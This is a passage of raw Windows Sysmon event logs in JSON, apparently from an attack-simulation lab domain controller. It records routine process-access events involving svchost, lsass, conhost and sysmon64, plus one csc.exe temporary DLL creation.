C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5459,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5460,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5461,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5462,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.875\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-00103A770A00}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.875","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-00103A770A00}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5463,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:46.890\r\nProcessGuid: {A837DB8D-032E-5F25-0000-0010AB730A00}\r\nProcessId: 2820\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\rnhc3lzn.dll\r\nCreationUtcTime: 2020-08-01 05:52:46.781","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:46.890","ProcessGuid":"{A837DB8D-032E-5F25-0000-0010AB730A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\rnhc3lzn.dll","CreationUtcTime":"2020-08-01 05:52:46.781","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5464,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.922\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.922","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5465,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.922\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.922","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5466,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.922\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.922","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
